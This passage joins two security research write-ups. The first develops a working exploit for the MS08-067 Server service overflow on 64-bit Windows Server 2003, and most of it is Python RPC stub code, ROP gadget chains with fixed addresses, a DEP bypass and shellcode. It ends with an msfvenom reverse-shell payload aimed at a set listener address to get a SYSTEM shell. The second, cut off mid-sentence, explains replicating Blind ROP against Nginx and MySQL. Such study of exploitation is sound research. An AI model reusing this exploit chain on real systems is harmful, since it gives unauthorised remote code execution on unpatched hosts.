stub += ' \x42\x42'*2            # RIP Overwrite  
stub += ' \x00\x00'*1            # RPC Path Trailing Null bytes  
 
# Misc 
stub += ' \x00\x00'              # Padding  
stub += ' \x01\x00\x00\x00'      # Max Buffer Count  
stub += ' \x02\x00\x00\x00'      # Prefix - Max Unicode Count  
stub += ' \x00\x00\x00\x00'      # Offset  
stub += ' \x02\x00\x00\x00'      # Prefix - Actual Unicode Count  
stub += ' \x5c\x00\x00\x00'      # Prefix + Trailing Null Bytes  
stub += ' \x01\x00\x00\x00'      # Pointer to Path Type  
stub += ' \x01\x00\x00\x00'      # Path type and flags  
 
dce.call(0x1f, stub)            # NetPathCanonicalize  
 
labs.mwrinfosecurity.com   
 6   
It is important to note that the content of the buffers that the PoC controls contain Unicode characters. 
This means that a bad character, such as a null byte, is only considered as such in the context of Unicode 
characters; that is, a single null byte with a prepended null byte. The same applies to other bad characters 
for this ex ploit, such as 0x0a, 0x0d, 0x5c, 0x5f, 0x2f, 0x2e and 0x40. Theref ore, a newline character ( 0x0a) 
is represented in Unicode as 0x000a . 
2.3 Ground Rules - Because Server 2003 x64 Said So  
As with all exploit development, where is the challenge if there is no protection? The Server service was 
configured to run w ith Data Execution Prevention (DEP) and 64 -bit. Yes, the 64 -bit architecture is 
considered a form of protection on its own, as the 64 -bit architecture's virtual address space has an upper 
limit of 0x000007ffffffffff  – which contains two consecutive null by tes. As Unicode null bytes are bad 
characters in the RPC path, it is not possible to simply overwrite past the instruction pointer to build a 
ROP-chain.  

 
labs.mwrinfosecurity.com   
 7  More bad news - after many hours spent recording different behaviour and trying to understand it, it w as 
not found possible to overwrite RIP with more than four bytes. This means that this exploit assumes the 
only direct return from after the buffer overflow is constrained to 32 -bit virtual addresses. This will be 
referred to as the 32 -bit sandbox.  
But all  is not lost. Luckily, the registers and stack have a few properties that could just work to our 
advantage. After the crash, the current stack frame contains only the RPC Path from the last " \" character , 
up to the value  overwriting RIP. It can also be see n that the RPC Path has an additional occurrence just a 
few memory locations up the stack from the overwritten return address.  
After accessing  the memory pointed to by R13, it was found that the entire  original stub was locat ed in a 
different stack frame. R13 was found pointing to the beginning of the RPC Path, as shown in the screenshot 
below. Note that the stack pointer was manually changed to make use of the stack window for illustrative 
purposes.  
 
With this in mind, the smashed stack was further invest igated for any other pointers or values that could 
be used. An interesting observation was made - the stack frame in which the buffer is being overwritten 
was being used for all RPC requests, which meant that the stack layout was exactly the same after eac h 
crash. This assumption was also verified after running other tool s against the service, such as enum4linux , 
to invoke some activity in the service before exploitation. It is assumed that this was part of an 
optimisation effort, due to the expected load t he system should handle.  
Using this stack observation, another interesting observation was made - the stack contained a value at  
0x190f360 which , like R13, pointed to a portion of the original st ub. In this case, the value at 0x190f360 
was pointing to the beginning of the Server UNC buffer of the original stub. This  will be useful for the 
development of the exploit, and  can be seen in the screenshot below.  

 
labs.mwrinfosecurity.com   
 8   
Therefore, from the above there are two values at known locations that point ba ck to the original stub 
message. By original, it is meant that the stack frame contains the entire message, including bad 
characters (the dream!). The only problem with getting there is, well, getting there.  
  

labs.mwrinfosecurity.com   
 9  3. The Exploit (I know you skipped the above)  
3.1 Tools – Yes, No mona.py! 
Unfortunately, there is no mona.py  for the development of this exploit  – mostly due to the reluctance to 
setup windbg . As some might be aware of, mona is a nice python plugin for Immunity Debugger  to aid with 
32-bit exploit development  (or 64 -bit, if you would prefer using WinDbg). Luckily there are quite a few 
distributed tools that can be used for 64 -bit exploit development. For this exploit, the following tools are 
used:  
 x64dbg  [5] – a free, open -source debugger that can attach to both 32 -bit and 64 -bit processes  
 ROPShell  [6] – an online service that analyses various file formats for ROP -gadgets  
ROPShell  offers additional features like sorting ROP -gadgets a ccording to what sort of memory 
manipulation or stack manipulation functions they can perform. This is quite useful, as it makes the 
process of finding the right gadgets to perform the right functions significantly easier. The table below 
shows the hashes of some of the DLL’s that were uploaded to ROPShell . These hashes can be used on 
ROPShell  to view the ROP -gadgets that were found for the corresponding DLL’s.  
DLL Name  Hash  
advapi32 .dll  30b66cacabeb1eceeca5b336f1548b67  
gdi32.dll  63720bcb2c0b3f4cd4e05578 2f5d982f  
kernel32 .dll  d3cbc6e982bdc19e52917a989ba9c63e  
msvcrt.dll  7c5731853b71a017e1cb1c76a0a3155a  
ntdll.dll  5fd51aee0d611d857fc1efdcd247dcdb  
ntmarta.dll  8ab4c7456b6ae16bd6bf3fbea12cf240  
samlib .dll  d9511d97ccd02315c7559581e09b928f  
rpcrt4.dll  41a107a811875f33fcbb6fa1c07ec61b  
ole32.dll  d757376256c31223b2350ae02f24ef59  
rutils.dll  eaa0625231f3adf1b09c19dd70ba354b  
wldap32.dll  92220de401db7c16b1c24229cc175be8  
wzcsvc.dll  4ae00ec89a0933760a0c28c7e8861a76  
rsaenh.dll  e6ef7384be038bf6c31542fc6ef3a0a1  
user32.dll  9aeb3130e5cf4f9caa2667f49c6795e5  
wuauserv.dll  ef7576af44b484f7a3e6072d633bab34  
 
labs.mwrinfosecurity.com   
 10  wuaeng.dll  0c67d1a5a092aeebb9ae6913cba1bcd1  
For completeness, the screenshot below shows the system information for the t arget operating system. 
As the SeDebugPrivilege  permission for the Server service was not granted to the Administrator  user by 
default, Process Explorer  was used to grant debugging permissions to this user.  
 
 
3.2 One RET to Rule Them All  
From the information gathered up to this point, it is evident that the exploit needs to involve some form 
of stack pivoting to achieve reliable code execution.  Stack pivoting refers to the manipulation of the stack 
pointer in order to control the destination of stack related o perations such as PUSH, POP and RET. This is 
mainly due to the little amount of control available in the original stack frame after the crash, as well as 
the 32 -bit sandbox, which limits the address space that can be returned to after the initial stack sma sh.  
These limitations prevented the use of very valuable ROP -gadgets that were only available in the higher 
ranges of the 64 -bit virtual address space. As a final limitation, it was found that none of the available 
ROP-gadgets provided an all -in-one solut ion for the stack pivot problem, which required that a number 
of ROP -gadgets be cha ined together from the initial RIP overwrite. Due to the inter -dependence of the 
ROP-gadgets used for this exploit, an overview of the ROP -gadgets are given below.  
1) Return to  the 64-bit address for 2nd gadget 
0x50001A5C mov esp,dword ptr ss:[rsp+60]  
0x50001A60 mov rdi,qword ptr ss:[rsp+88]  
0x50001A68 mov rbp,qword ptr ss:[rsp+78]  
0x50001A6D mov rbx,qword ptr ss:[rsp+70]  
0x50001A72 add rsp,68  
0x50001A76 ret  
 
2) Prepare RAX for next call, RCX for stack pivot and RDX for final call  
0x07FF7FDE4859 mov rax,qword ptr ds:[r13+158]  
0x07FF7FDE4860 mov rdx,qword ptr ds:[r13+160]  

 
labs.mwrinfosecurity.com   
 11  0x07FF7FDE4867 mov rcx,qword ptr ds:[r13+180]           
0x07FF7FDE486E call qword ptr ds:[rax+18]  
   
3) Dereferen ce pivot destination pointed to by RCX and call RDX  
0x07FF7E2F344A mov rax,qword ptr ds:[rcx+8]  
0x07FF7E2F344E lea rcx,qword ptr ss:[rsp+60]  
0x07FF7E2F3453 mov qword ptr ds:[r8+8],rax         
0x07FF7E2F3457 call rdx  
 
4) Final Stack Pivot  
0x07FF7E308C6F xchg eax,esp 
0x07FF7E308C70 ret  
 
With these ROP -gadgets, the goal will be to perform a stack pivot to align RSP with the Server UNC pointed 
to by a value on the smashed stack. Therefore, the stack pivot demonstrated in this section takes into 
consideration th e following:  
 The first ROP -gadget will be located in the 32 -bit virtual address space  
 Attempt to break out of the 32 -bit sandbox to access the second ROP -gadget  
 Control the value of RIP after each ROP -gadget  
 Perform a stack pivot that will r esult in comple te control over RIP 
3.2.1  Away with you, sandbox!  
The first part of the ROP -chain will allow the execution of a ROP -gadget in the 64 -bit address space from 
the 32 -bit return address. This is challenging , as there are no ROP -gadgets in this space which  can 
populate a register with a 64 -bit value – mainly due to the Unicode null byte constraints.  
To recap, the upper limit of the 64 -bit address space starts with two consecutive null bytes – a Unicode 
null byte. Therefore, it is not possible to directly inc lude a 64 -bit address somewhere in the RPC Path with 
the default character alignment. To circumvent this, a different character alignment approach was 
followed, as shown below.  
0x000007ffffffff ff => 0x41000007ffffff ffff41 
In this example, the address 0x000007ffffffffff  was prepended with an additional byte and concluded 
with an additional byte. This technique divided the Unicode null byte between the appended 0x41 byte 
and t he original 0x07 byte. Essentially, if it is possible to have the first ROP -gadget perform an arbitrary 
stack alignment, it  will be possible to align RSP with the beginning of the embedded 64 -bit address and 
return to a 64 -bit memory location.  
To achieve this, the ROP -gadget s hown below, which was found in wuauserv.dll , is used. This  gadget 
performs two operations to take  note of – the first operation ( mov esp, [rsp+0x60] ) dereferences the 
value at RSP+0x60  into ESP (the lower 32 -bytes of RSP). The second operation lifts RSP by 0x68. 
0x50001A5C mov esp,dword ptr ss:[rsp+60]  
0x50001A60  mov rdi,qword ptr ss:[rsp+88]  
0x50001A68 mov rbp,qword ptr ss:[rsp+78]  
0x50001A6D mov rbx,qword ptr ss:[rsp+70]  
0x50001A72 add rsp,68  
0x50001A76 ret   
 
labs.mwrinfosecurity.com   
 12   
Remember that the RPC Path buffer occurs twice in the smashed stack frame, and that the second 
occurrence is up the stack , within the stack lifting operation’s range . Therefore the value being 
dereferenced can be controlled, and that due to the instruction only writing  into the lower 32 -bits of the 
RSP register, the upper 32 -bits of RSP remain uncha nged. Also, remember that the addressing of the 
smashed stack stays the same after subsequent requests, and that it  is therefore possible to have RSP 
reliably point to an arbitrary value on the stack.  
The 64 -bit address to return to will therefore be store d at 0x0190ee59 , which requires populating ESP 
with the value 0x190edf1  to compensate for the 0x68 byte stack lift. Also , after the crash the value of 
RSP+0x60  points to the 37th Unicode character of the RPC Path. The skeleton PoC is updated, and shown 
below.  
# ROP variables  
rop1_addr = 0x50001 a5c 
rop1_esp  = 0x0190edf1  
rop2_addr = 0x000007ff7fde4859  
 
# Misc 
stub =  ' \x01\x00\x00\x00'      # Reference ID  
 
# Server UNC  
stub += ' \x10\x00\x00\x00'      # Server UNC - Max Buffer Count  
stub += ' \x00\x00\x00\x00'      # Offset  
stub += ' \x10\x00\x00\x00'      # Server UNC - Actual Buffer Count  
stub += ' \x50\x50'*15           # Server UNC Buffer Content  
stub += ' \x00\x00'*1            # S erver UNC Trailing Nullbytes  
 
# RPC Path  
stub += ' \x2f\x00\x00\x00'      # RPC Path - Max Buffer Count  
stub += ' \x00\x00\x00\x00'      # Offset  
stub += ' \x2f\x00\x00\x00'      # RPC Path - Actual Buffer Count  
 
# Trigger Path = \A\..\..\ 
# Size: 18 bytes =>  9 Unicode characters  
stub += ' \x5c\x00\x45\x00\x5c\x00\x2e\x00'  # Trigger Path  
stub += ' \x2e\x00\x5c\x00\x2e\x00\x2e\x00'  # Trigger Path  
stub += ' \x5c\x00'                          # Trigger Path  
 
# Remaining Buffer  
stub += ' \x41'                      # Garbage Byte  
stub += struct.pack('Q', rop2 _addr) # ROP-gadget 2 address  
stub += ' \x41'                      # Garbage Byte  
stub += ' \x41\x41'*23               # Padding  
stub += struct.pack('I', rop1_esp)  # ROP-gadget 1 ESP value  
stub += ' \x41\x41'*5                # Padding  
stub += struct.pack('I', rop1 _addr) # ROP-gadget 1 return address  
stub += ' \x00\x00'                  # Trailing Unicode null byte  
 
# Misc 
stub += ' \x00\x00'              # Padding  
stub += ' \x01\x00\x00\x00'      # Max Buffer Coun t 
stub += ' \x02\x00\x00\x00'      # Prefix - Max Unicode Count  
stub += ' \x00\x00\x00\x00'      # Offset  
stub += ' \x02\x00\x00\x00'      # Prefix - Actual Unicode Count  
stub += ' \x5c\x00\x00\x00'      # Prefix + Trailing Null  bytes 
stub += ' \x01\x00\x00\x00'      # Pointer to Path Type 
stub += '\x01\x00\x00\x00'      # Path T ype and flags  
 
 
labs.mwrinfosecurity.com   
 13   
The 64 -bit target in the above address points to the next ROP -gadget, which will be explained next. But 
for now, the target location’s inst ruction has been changed to an int3 instruction. The updated PoC’s 
result s are shown in the screenshot s below . The first screenshot depicts the stack alignment, and the 
second screenshot depicts the instruction pointer pointing to the start of the second ROP-gadget.  
 
 
3.2.2  Registering Control  
The next  ROP-gadget , which  was found in rpcrt4.dll , provides an interest ing feature – control over the 
RAX, RCX and RDX registers . This is because the offset 0x158  from the value in R13 points to a location past 
the cras h string – which is good, because this is a region that can contain any characters, as long as the 
RPC Path buffer’s size is adjusted. Also, notice that the last instruction dereferences and calls the value 
stored at RAX+0x18 , which provides a method for c ontrolling RIP to execute the next ROP -gadget.  
0x07FF7FDE4859 mov rax,qword ptr ds:[r13+158]  
0x07FF7FDE4860 mov rdx,qword ptr ds:[r13+160]  
0x07FF7FDE4867 mov rcx,qword ptr ds:[r13+180]           
0x07FF7FDE486E call qword ptr ds:[rax+18]  
 
The values that will populate the three registers controlled in this gadget will be determined by looking at 
the third ROP -gadget to be executed. The third ROP -gadget,  which was found in ntmarta.dll  and is  
located at 0x07ff7e2f344a, dereferences the value pointed at by RCX+0x8  and th en calls RDX. Remember 

 
labs.mwrinfosecurity.com   
 14  that the sma shed stack contains a value at 0x190f360  that points to the beginning of the Server UNC 
buffer. Therefore, this ROP -gadget needs to popul ate RCX with the value 0x190f358 and RDX with the 
address of the final  ROP-gadget, which is located at 0x07ff7e308c6f – which was also found in 
ntmarta.dll . 
Also, RAX needs to be populated with an address that can be dereferenced and called  and also compensates 
for the 0x18 byte offset ( CALL [RAX + 0x18] ). The same approach will be followed as with the first ROP -
gadget. The next ROP -gadget’s address, 0x07ff7e2f344a, will be placed in the RPC Path buffer such that 
it appears on the smashed stack. This 64 -bit address, including its two garbage bytes, will be p laced right 
after the first 64 -bit address in the RPC Path  buffer. The updated skeleton Po C, with the adjusted RPC 
Path buffer size, is shown below.  
# ROP variables  
rop1_addr = 0x50001a5c          # ROP -Gadget 1 Address  
rop1_esp  = 0x0190edf1           # ESP Value  
rop2_addr = 0x000007ff7fde4859   # ROP-Gadget 2 Address  
rop2_rax  = 0x190ee4b           # RAX = 0x190ee63 - 0x18 
rop2_rcx  = 0x19 0f358           # RCX = 0x190f360 – 0x8 
rop3_addr = 0x07ff7e2f344a       # ROP-Gadget 3 Address  
rop4_addr = 0x07ff7e308c6f      # ROP-Gadget 4 Address (RDX)  
 
# Misc 
stub =  ' \x01\x00\x00\x00'      # Reference ID  
 
# Server UNC  
stub += ' \x10\x00\x00\x00'      # Server UNC - Max Buffer Count  
stub += ' \x00\x00\x00\x00'      # Offset  
stub += ' \x10\x00\x00\x00'      # Server UNC - Actual Buffer Count 
stub += ' \xff\xee\xee\xbb'      # Server UNC Buffer Content  
stub += ' \xdd\xaa\xee\xdd'      # Server UNC Buffer Content  
stub += ' \x50\x50'*11           # Server UNC Buffer Content  
stub += ' \x00\x00'*1            # Server UNC Trailing  Unicode Null Byte 
 
# RPC Path  
stub += ' \xc5\x00\x00\x00'      # RPC Path - Max Buffer Count  
stub += ' \x00\x00\x00\x00'      # Offset  
stub += ' \xc5\x00\x00\x00'      # RPC Path - Actual Buffer Count  
 
# Trigger Path = \A\..\..\ 
stub += ' \x5c\x00\x45\x00\x5c\x00\x2e\x00'  # Trigger Path  
stub += ' \x2e\x00\x5c\x00\x2e\x00\x2e\x00'  # Trigger Path  
stub += ' \x5c\x00'                          # Trigger Path  
 
# Remaining Buffer  
stub += ' \x41'                      # Garbage Byte  
stub += struct.pack('Q', rop2_addr) # ROP -gadget 2 add ress 
stub += ' \x41'                      # Garbage Byte  
stub += ' \x41'                      # Garbage Byte  
stub += struct.pack('Q', rop3_addr)  # ROP-gadget 3 address  
stub += ' \x41'                      # Garbage Byte  
stub += ' \x41\x41'*18               # Padding 
stub += struct.pack('I', ro p1_esp)  # R OP-gadget ESP value  
stub += ' \x41\x41'*5                # Padding  
stub += struct.pack('I', rop1_addr)  # ROP-gadget 1 return address  
stub += ' \x00\x00'                  # Trailing Unicode Null Byte 
stub += '\x41\x41'*125              # Padding  
stub += struct.pack('Q', rop2_rax)  # RAX Value  
stub += struct.pack('Q', rop4_addr) # RDX Value  
stub += ' \x41\x41'*12               # Padding  
stub += struct. pack('Q', rop2_rcx)  # RCX Value  
stub += ' \x00\x00'                  # Padding  
 
 
labs.mwrinfosecurity.com   
 15  # Misc 
stub += ' \x00\x00'              # Padding  
stub += ' \x01\x00\x00\x00'      # Max Buffer Count  
stub += ' \x02\x00\x00\x00'      # Prefix - Max Unicode Count  
stub += ' \x00\x00\x00\x00'      # Offset  
stub += ' \x02\x00\x00\x00'      # P refix - Actual Unicode Count  
stub += ' \x5c\x00\x00\x00'      # Prefix + Trailing Null  Bytes 
stub += ' \x01\x00\x00\x00'      # Pointer to Path Type 
stub += ' \x01\x00\x00\x00'      # Path type and flags  
 
The screenshot be low depicts the result of the Po C up to the execution of the third RO P-gadget. The right 
side shows RIP pointing to the start of the third ROP -gadget, and the left side shows the values of RCX 
and RDX being as expected.  
 
3.2.3  Pivoting to a Better Place  
With the last update to the PoC preparation  was already made to perform the final stack pivot.  The last 
two ROP -gadgets that need to be executed are shown below. Given the state of the registers after the last 
PoC update, the third ROP -gadget should dereference RCX+0x8  into RAX, which will have RAX point to the 
start of the original Server UNC buffer.  
# ROP-Gadget 3  
0x07FF7E2F344A mov rax,qword ptr ds:[rcx+8]  
0x07FF7E2F344E lea rcx,qword ptr ss:[rsp+60]  
0x07FF7E2F3453 mov qword ptr ds:[r8+8],rax         
0x07FF7E2F3457 call rdx  
 
# ROP-Gadget 4  
0x07FF7E308C6F xchg eax,esp  
0x07FF7E308C70 ret  
 
At the end of the ROP -gadget, the value of RDX is called, which points to the final ROP -gadget. The final 
ROP-gadget will swap the values of EAX and ESP, effectively pointing the stack pointer to the beginning of 
the Server UNC buffer. Letting the current PoC complete its execution results in the Access Violation  
shown below.  

 
labs.mwrinfosecurity.com   
 16   
From analysing the values of RSP and the stack, it can be seen that RSP is now pointing at a fully 
controllable part of memory. A successful stack pivot has been achieved.  
3.3 From DEP to INT3 
The 64 -bit version s of Windows are configured to make use of the fast-call calling convention by default. 
The main property of this callin g convention to take note of for the exploit is that integer arguments , 
which could represent actual integer values or 64 -bit pointers,  are passed to functions using the RCX, RDX, 
R8 and R9 registers – in this order.  In its own way, this makes ROP -chaining  functions with arguments less 
tedious than having to strategically prepare the stack.  
In order to disable DEP for the memory page  that RSP is pointing to , the VirtualAlloc  method will be used. 
The definition for  VirtualAlloc  is shown below, along with the argument values . 
LPVOID WINAPI VirtualAlloc(            # Address: 0x 78d6f3d0 
  _In_opt_ LPVOID lpAddress,           # RCX: Address in current 0x1000 byte memory page 
  _In_     SIZE_T dwSize,              # RDX: 0x1 
  _In_     DWORD  fl AllocationType,    # R8:  0x1000  (MEM_COMMIT)  
  _In_     DWORD  flProtect            # R9:  0x40  (PAGE_EXECUTE_READWRITE)  
); 
 
With the above information, the Server UNC buffer’s size and content are updated and shown below.  
# Server UNC  
stub += '\x4a\x00\x00\x00'      # Server UNC - Max Buffer Count  
stub += ' \x00\x00\x00\x00'      # Offset  
stub += ' \x4a\x00\x00\x00'      # Server UNC - Actual Buffer Count  
 
# Server UNC Buffer Content  
stub += struct.pack('Q', 0x07ff7e45b47f) # pop rax; ret;  
stub += struct.pack('Q', 0x190f360)      # value of rax  
stub += struct.pack('Q', 0x07ff7fee50da) # pop rdx; ret;  
stub += struct.pack('Q', 0x07ff7e45e834) # value of rdx. points to:  
                                         # pop rbx; ret;  
stub += struct.pack('Q' , 0x07ff7ff6314e) # rcx = lpAddress  
                                         # mov rcx, [rax]; call rdx  
stub += struct.pack('Q', 0x07ff7fee50da) # pop rdx; ret;  

 
labs.mwrinfosecurity.com   
 17  stub += struct.pack('Q', 0x1)            # dwSize = 0x1  
stub += struct.pack('Q', 0x07ff7e4a38a9) # pop r8; ret;  
stub += struct.pack('Q', 0x1000)         # flAllocationType = 0x1000  
stub += struct.pack('Q', 0x07ff7e796012) # pop r9; mov rbx, [rsp+0x40]; add rsp, 0x28; ret  
stub += struct.pack('Q', 0x40)           # flProtect = 0x40  
stub += '\x50\x50'*20                    # compensate for 0x28 byte stack lift  
stub += struct.pack('Q', 0x78d6f3d0)     # VirtualAlloc  
stub += struct.pack('Q', 0x5000218b)     # jmp rsp;  
stub += ' \xcc\xcc'                       # int3; int3;  
stub += ' \x00\x00'                       # Server UNC Trailing Null  Bytes 
 
The initial ROP -gadgets are responsible for populating RCX with a pointer to the current memory page. 
Using a similar technique as the stack pivot, the value  0x190f360  is pop’d into RAX and in a late r gadget 
dereferenced into RCX, essentially storing a pointer to  the start of the ROP -chain in RCX. 
Since the values for the other argume nts are known, they are simply pop’d into the appropriate registers 
down the ROP -chain.  The ROP -gadget that populates R9 includes a 0x28 byte stack lift, which is 
compensated for by padding bytes.  
After populating the registers with the arg uments, the service returns to VirtualAlloc  to change the 
memory page’s perm issions. This is followed by a jmp rsp ROP-gadget to redirect code execution to the 
int3 instruction down the stack. The two screenshots below show  the execution right flag set on the 
current memory page and the int3 breakpoint being hit. Successful code execution has been achieved.  
 
 
labs.mwrinfosecurity.com   
 18  3.4 You’re in the “ NT AUTHORITY \SYSTEM” 
Before proceeding to just adding shellcode and getting a reverse shell, some initial shellcode needs to be 
added. After a few trial runs it was found that in some instances  a large Server UNC buffer would overrun 
into the next memory page  – which is not marked as executable. To circumvent this, the initial shellcode 
will mark the next memory page as executable, and also decrease RSP by 0x400  to ensure the shellcode 
can use the stack without accidentally overwriting any shellcode . This shellcode is shown below, followed 
by a screenshot showing the execution flag set for the next memory page.  
stub += ' \x48\x89\xe1'                   # mov rcx,rsp                              
stub += ' \x48\x81\xc1\x00\x10\x00\x00'   # add rcx,1000                             
stub += ' \x48\xc7\xc2\x01\x00\x00\x00'   # mov rdx,1                                
stub += ' \x49\xc7\xc0\x00\x10\x00\x00'   # mov r8,1000                              
stub += ' \x49\xc7\xc1\x40\x00\x00\x00'   # mov r9,40                                
stub += ' \x48\x81\xec\x00\x04\x00\x00'   # sub rsp,400                              
stub += ' \x48\xc7\xc0\xd0\xf3\xd6\x78'   # mov rax,<kernel32.VirtualAlloc>          
stub += ' \xff\xd0'                       # call rax  
 
 
The PoC is ready  to execute shellcode.  For this example, msfvenom ’s standard Windows 64 -bit reverse -
shell payload is used.  The code below shows the updated Server UNC buffer’s content , followed by a 
beautiful picture of a  wild SYSTEM  shell.  
# Server UNC Payload  
stub += struct.pack('Q', 0x07ff7e45b47f) # pop rax; ret;  
stub += struct.pack('Q', 0x190f360)      # value of rax  
stub += struct.pack('Q', 0x07ff7fee50da) # pop rdx; ret;  
stub += struct.pack('Q', 0x07ff7e45e834) # value of rdx. points to:  
                                         # pop rbx; ret;  
stub += struct.pack('Q', 0x07ff7ff6314e) # mov rcx, [rax]; call rdx  
stub += struct.pack('Q', 0x07ff7fee50da) # pop rdx; ret;  
stub += struct.pack('Q', 0x1)            # dwSize = 0x1  
stub += struct.pac k('Q', 0x07ff7e4a38a9) # pop r8; ret;  
stub += struct.pack('Q', 0x1000)         # flAllocationType = 0x1000  
stub += struct.pack('Q', 0x07ff7e79 6012) # pop r9; mov rbx, [rsp+ 0x40]; add rsp, 0x28; ret  
stub += struct.pack('Q', 0x40)           # flProtect = 0x4 0 
stub += ' \x50\x50'*20                    # compensate for 0x28 byte stack lift  
stub += struct.pack('Q', 0x78d6f3d0)     # VirtualAlloc  
stub += struct.pack('Q', 0x5000218b)     # jmp rsp;  
stub += ' \x90\x90'                       # nop; nop;  
 
# Initial She llcode 
stub += ' \x48\x89\xe1'                   # mov rcx,rsp                              
stub += ' \x48\x81\xc1\x00\x10\x00\x00'   # add rcx,1000                             

 
labs.mwrinfosecurity.com   
 19  stub += ' \x48\xc7\xc2\x01\x00\x00\x00'   # mov rdx,1                                
stub += ' \x49\xc7\xc0\x00\x10\x00\x00'   # mov r8,1000                              
stub += ' \x49\xc7\xc1\x40\x00\x00\x00'   # mov r9,40                                
stub += ' \x48\x81\xec\x00\x04\x00\x00'   # sub rsp,400                              
stub += ' \x48\xc7\xc0\xd0\xf3\xd6\x78'   # mov rax,<kernel32.VirtualAlloc>          
stub += ' \xff\xd0'                       # call rax                                 
stub += ' \x90'                           # nop  
 
# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.10.24 LPORT=5555 EXITFUNC=thread -f python 
#  shellcode  size: 460 bytes => 230 Unicode characters  
stub += shellcode  
 
stub += ' \x90\x90'*(250 - (len(shellcode )/2)) # NOP padding  
 
stub += ' \x00\x00'                       # Server UNC Trailing Null  Bytes 
 
 
labs.mwrinfosecurity.com   
 20  
 Reliability  Considerations  
To conclude this write -up, the reliability of this PoC needs to be addressed. As was seen during the 
development of the PoC, an assumption was made that the original smashed stack is always located at 
the same place in memory, with the same layout. Ideally , this should be avoided  when developing reliable 
exploits . But this assumption was key to achieving command execution and deemed valid due to the 
consistency of it even after performing aggressive enumeration against the target service.  
Although, it was found that invalid RPC requests,  which occur as a result of malformed stubs,  from time 
to time resulted in stack offsets  for consecutive RPC requests.  But these malformed stubs only occurred 
as a result of misconfigur ed buffer sizes in the  stub.  
Also, it was found that the Server service would crash during the execution of the shellcode. This finding 
is what motivated the initial stack lifting shellcode, and also aided in discovering that large stubs caused 
shellcode to overrun into the nex t, non -executable, memory page. But the Server service would still crash 
from time to time , and it is assumed to be as a result of the Server service’s state after the shellcode’s 
execution. For the scope of this write -up, this  investigation is not include d.  
 
labs.mwrinfosecurity.com   
 21  4. References  
[1] https://technet.microsoft.com/en -us/library/security/ms08 -067.aspx   
[2] https://en.wikipedia.org/w iki/Conficker   
[3] http://www.phreedom.org/blog/2008/decompiling -ms08 -067/  
[4] https://www.reddit.com/r/AskNetsec/comments/27qjj4/anyone_know_where_some_poc_code_for_ms08067_is/   
[5] http://x64dbg.com/  
[6] http://ropshell.com/  
[7] https://msdn.microsoft.com/en -us/library/ms235286.aspx    
 
 
 Blind Return Oriented Programming  
 
tl;dr 
In 2014 a paper [http://www.scs.stanford.edu/brop/bittau -brop.pdf ] which introduces Blind Return 
Oriented Programming (BROP),  a state -of-the-art exploitation technique, was released by 
researchers from Stanford University. The paper  discusses a general approach in which  BROP  is 
used  to exploit services  which are both vulnerable to stack -based buffer overflows and automatically 
recover afte r a crash. What is best about the  BROP  technique  is that one does not need to possess 
the binary and the source code of the target service to be able to successfully exploit it.  
I have tried to replicate the research and exploit the Nginx and MySQL vulner abilities using BROP to 
better understand the technique ; unfortunately, I have found that the tool released by the res earchers 
failed to exploit either bug in my test environment . The idea is brilliant and works in theory , and  the 
code was  clearly  working for them  in their test environments . What could  be the difference(s) that 
result ed in the same vulnerabilities not being exploitable by the tool? In this blog post we will have a 
look at some important steps of the exploitation technique.  
For those not fam iliar with the BROP technique , it is highly advised t hat you  read the  previously linked  
BROP paper first , as this post assumes the reader is familiar with the idea and the process.  
 
Stack Reading  
Stack reading is based on the idea that one can read values from the stack by brute -forcing each byte 
position of the value. If a correct value is found for the given byte position the application will continue 
to run, otherwise it will crash. This allows reading the stack canary (if it is there ), data , code  pointers , 
and so on.  This technique heavily relies on the aforementioned requirement that the target service will 
gracefully recover from crashes – typically this simply involves the servi ce forking a new process to 
handle each incoming request.  
 
 
Figure  1: Stack reading  
 
As illustrated  in the diagram above, b y stack reading we can  eventually  brute -force the stack 
canaries , therefore bypassing the mitigation  if the canary does not change between crashes ; 
furthermore,  we can read the return address which r esults in an ASLR bypass. However, while 
developing the exploit for MySQL and Nginx  I had to face several difficulties , explained below.  

  
 Unusual Buffer  Handling  
The first difficulty  addressed by the proof -of-concept  code provided by the researchers  was that the 
MySQL vulnerability involved an overrun buffer  that was populated backwards  – in the opposite 
direction from that to which you would typically expect a stack buffer to be written . Because of this 
quirk , the payload had to be reversed before s ending it to MySQL. This backwards copy can  best be 
explained using the diagram below.  
 
 
Figure 2: MySQL Buffer Overflow  
 
A quick investigation revealed that function B received a pointer to a buffer allocated  by its caller. 
Function B passed this pointer to function C, which started reading data into the buffer starting from 
the end of the buffer. Function C did not check the size of the buffer and started to overwrite data in 
stack frame B ; this included the ret urn address of function B. In terms of exploitation this makes things 
quite easy , as neither function B nor function C allocated anything on the stack , therefore the stack 
frame of these functions did not contain a stack canary. Even if there had been a stack canary , it 
would have been possible to read it. To summarise : the return address to be overwritten was not 
after, but before , the buffer.  Despite this, it was still possible to read the stack of  both Nginx and 
MySQL with some small modification s. 
Return Address Location  
The second issue I had to face was more challenging , and probably this is the point where I will 
contribute something useful to future use of the BROP  technique . The BROP paper mentioned that 
one has to read three values  (including the canary) to get the return address. It might have been the 
case for the authors of the paper , as I’ve illustrated on the left side of the diagram below,  but my 
version of the services , compiled on Ubuntu , proved otherwise.  
 

Figure 3: Return Address L ocation  
 
As shown  above, in my case (on the right) the return address was not at the location where the proof -
of-concept code expected it. As a result, the code failed at the very early stages of the exploitation.  
The first diagram illustrated in the offic ial StackGuard stack protection paper 
[ftp://gcc.gnu.org/pub/gcc/summit/2003/Stackguard.pdf ] shows that there are saved register values 
between the canary and the return address. I’ve inc luded a diagram similar to the one  in their paper 
below.  
 
 
Figure 4: StackGuard Stack Layout  
 
What’s illustrated above pretty  much matched my scenario , and thus raises the question: how  do we 
find out where the return address is?  The original researchers’  BROP proof -of-concept  used patterns 
to detect whether ASLR is enabled or not , and to determine the nature of some of the values on the 
stack. I thought I might be able to reuse this to find the return address. The code assumed the 
following , described with pseudocode:  
    if address > 0x400000 and address < 0x500000: CODE – NO ASLR 
    if (address & 0x7fff00000000) == 0x7fff00000000: STACK FRAME POINTER  
    if (address & 0x7f0000000000) == 0x7f0000000000: CODE - ASLR 

  
 While experimenti ng with this code I encountered, and thought of, a number of problems with the 
assumptions made. Some of these manifested in the form of both false positives  and false negatives. 
First, d epending on the size of the target service it might happen that in ca se ASLR protection is 
disabled, the return address is actually greater than 0x500000, which was the case with the MySQL  
binary I was exploiting . Second, w hat if for example  the value 0x4e4033 is just a simple numeric value 
pushed onto the stack for some re ason? Finally , in my testing the third pattern matched both data and 
